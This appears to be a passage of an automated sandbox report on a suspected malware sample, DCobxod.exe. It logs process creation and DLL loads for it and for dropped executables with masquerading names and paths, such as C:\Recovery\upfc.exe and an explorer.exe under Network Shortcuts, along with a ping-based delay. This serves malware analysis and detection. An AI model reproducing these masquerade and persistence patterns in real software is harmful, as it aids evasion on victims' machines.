                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: version.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: propsys.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: edputil.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: urlmon.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: iertutil.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: srvcli.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: netutils.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: policymanager.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: msvcp110_win.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: appresolver.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: bcp47langs.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: slc.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: userenv.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: sppc.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: pcacli.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exe | Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: mscoree.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: apphelp.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: version.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: uxtheme.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: windows.storage.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: wldp.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: profapi.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: cryptsp.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: rsaenh.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: cryptbase.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: sspicli.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: ktmw32.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: ntmarta.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: wbemcomn.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: amsi.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: userenv.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: propsys.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: dlnashext.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: wpdshext.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: edputil.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: urlmon.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: iertutil.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: srvcli.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: netutils.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: wintypes.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: appresolver.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: bcp47langs.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: slc.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: sppc.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Browserhost\intoHostperf.exe | Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: mscoree.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: apphelp.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: version.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: uxtheme.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: windows.storage.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: wldp.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: profapi.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: cryptsp.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: rsaenh.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: cryptbase.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: sspicli.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: mscoree.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: version.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: uxtheme.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: windows.storage.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: wldp.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: profapi.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: cryptsp.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: rsaenh.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: cryptbase.dll
                                    Source: C:\Recovery\upfc.exe | Section loaded: sspicli.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: mscoree.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: apphelp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: version.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: uxtheme.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: windows.storage.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: wldp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: profapi.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: cryptsp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: rsaenh.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: cryptbase.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Section loaded: sspicli.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: mscoree.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: apphelp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: version.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: uxtheme.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: windows.storage.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: wldp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: profapi.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: cryptsp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: rsaenh.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: cryptbase.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: sspicli.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: mscoree.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: version.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: uxtheme.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: windows.storage.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: wldp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: profapi.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: cryptsp.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: rsaenh.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: cryptbase.dll
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
